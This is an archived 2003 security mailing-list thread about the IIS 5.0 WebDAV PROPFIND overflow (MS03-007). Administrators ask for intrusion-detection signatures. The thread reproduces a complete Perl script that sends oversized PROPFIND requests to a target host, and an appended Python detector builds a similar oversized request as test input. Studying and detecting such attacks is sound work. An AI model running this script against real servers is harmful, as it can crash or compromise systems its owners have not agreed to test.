[unisog] IIS problem du jour

Johannes Ullrich jullrich at euclidian.com
Tue Mar 18 14:49:47 GMT 2003



This was posted to Slashdot as a 'test' to find vulnerable servers. Haven't tried it yet:

--------------------

#!/usr/bin/perl
# Written by Georgi Guninski
use IO::Socket;
print "IIS 5.0 propfind\n";
$port = @ARGV[1];
$host = @ARGV[0];
sub vv()
{
$ll=$_[0]; #length of buffer
$ch=$_[1];
$over=$ch x $ll; #string to overflow
$socket = IO::Socket::INET->new(PeerAddr => $host,PeerPort => $port,Proto => "TCP") || return;
#$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."$over".':"><a:prop ><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
# ^^^^ This is another issue and also works with length ~>65000
$xml='<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="'."over".':"><a:prop><a:displayname />'."<u:$over />".'</a:prop></a:propfind>'."\n\n";
$l=length($xml);
$req="PROPFIND / HTTP/1.1\nContent-type: text/xml\nHost: $host\nContent-length: $l\n\n$xml\n\n";
syswrite($socket,$req,length($req));
print ".";
$socket->read($res,300);
#print "r=".$res;
close $socket;
}
do vv(128008,"V"); # may need to change the length
sleep(1);
do vv(128008,"V");
print "Done.\n";

-------------------


On Tue, 18 Mar 2003 08:18:13 -0500
"Joshua Wright" <Joshua.Wright at jwu.edu> wrote:

> Can anyone shed some light on a signature that could be used to detect
> this tool?  The snort-sigs list hasn't come up with a signature for this
> attack yet.  If anyone believes they are seeing attacks to exploit this
> vulnerability, please share obfuscated logging information from IIS.
> 
> Thanks.
> 
> -Joshua Wright
> Senior Network and Security Architect
> Johnson & Wales University
> Joshua.Wright at jwu.edu 
> http://home.jwu.edu/jwright/
> 
> pgpkey: http://home.jwu.edu/jwright/pgpkey.htm
> fingerprint: FDA5 12FC F391 3740 E0AE BDB6 8FE2 FC0A D44B 4A73
> 
> 
> 
> > -----Original Message-----
> > From: Valdis.Kletnieks at vt.edu [mailto:Valdis.Kletnieks at vt.edu]
> > Sent: Monday, March 17, 2003 5:57 PM
> > To: Anderson Johnston
> > Cc: unisog at sans.org; security at umbc.edu
> > Subject: Re: [unisog] IIS problem du jour 
> > 
> > 
> > On Mon, 17 Mar 2003 17:07:27 EST, Anderson Johnston said:
> > > 
> > > 
> > > http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS03-007.asp
> > > 
> > > An attack on IIS WebDAV.  The CAN reference given in the above URL is
> > > still under CVE editorial review.
> > > 
> > > 
> > > Has anyone seen this in the wild?  Got any NIDS signatures for it?
> > 
> > Yes, it's in the wild - a 0-day nailed some .MIL servers.
> > 
> > http://www.msnbc.com/news/886524.asp?0cv=CB10
> > 
> > http://www.cert.org/advisories/CA-2003-09.html
> > 
> > 
> 


-- 
--------------------------------------------------------------------
jullrich at euclidian.com             Collaborative Intrusion Detection
                                         join http://www.dshield.org
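
On the signature question quoted above, the script's visible traits (a PROPFIND request, bare-LF line endings, a very large body, one XML name of roughly 128008 bytes) can be checked directly on a captured request. The following is an added example, not part of the original thread or of the posted script; the function names, the thresholds and the www.example.edu host are assumptions.

```python
import re

# Assumed thresholds, not taken from the thread: tune them per site.
MAX_NAME_LEN = 256        # longest XML name or attribute value tolerated
MAX_BODY_LEN = 16 * 1024  # largest PROPFIND body tolerated
TOKEN = re.compile(rb"[^<>\"'\s/=:]+")  # runs between XML delimiters

def inspect_request(raw: bytes) -> list:
    """Return the reasons a raw HTTP request resembles the posted test."""
    parts = re.split(rb"\r?\n\r?\n", raw, maxsplit=1)
    head, body = parts[0], (parts[1] if len(parts) > 1 else b"")
    lines = head.splitlines()
    if not lines or not lines[0].upper().startswith(b"PROPFIND "):
        return []
    reasons = []
    # The posted script ends its header lines with a bare LF, not CRLF.
    if b"\r\n" not in raw[:len(head) + 2]:
        reasons.append("bare-LF line endings")
    # A sensor may only see the first packet, so trust the declared
    # Content-Length as well as the bytes actually captured.
    declared = 0
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"content-length" and value.strip().isdigit():
            declared = int(value.strip())
    size = max(declared, len(body))
    if size > MAX_BODY_LEN:
        reasons.append(f"PROPFIND body of {size} bytes")
    longest = max((len(t) for t in TOKEN.findall(body)), default=0)
    if longest > MAX_NAME_LEN:
        reasons.append(f"XML token of {longest} bytes")
    return reasons

def sample(name_len: int, eol: bytes) -> bytes:
    """Constructed input: PROPFIND with one element name of name_len bytes."""
    xml = (b'<?xml version="1.0"?><a:propfind xmlns:a="DAV:" xmlns:u="over:">'
           b"<a:prop><a:displayname /><u:" + b"V" * name_len
           + b" /></a:prop></a:propfind>")
    head = eol.join([b"PROPFIND / HTTP/1.1", b"Content-type: text/xml",
                     b"Host: www.example.edu",
                     b"Content-length: %d" % len(xml)])
    return head + eol + eol + xml

if __name__ == "__main__":
    for label, req in [("LF, 128008-byte name", sample(128008, b"\n")),
                       ("CRLF, short name", sample(10, b"\r\n"))]:
        print(label, "->", inspect_request(req) or "clean")
```

The bare-LF check fingerprints this particular script only; the size and token-length checks are the ones that survive a rewritten client.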


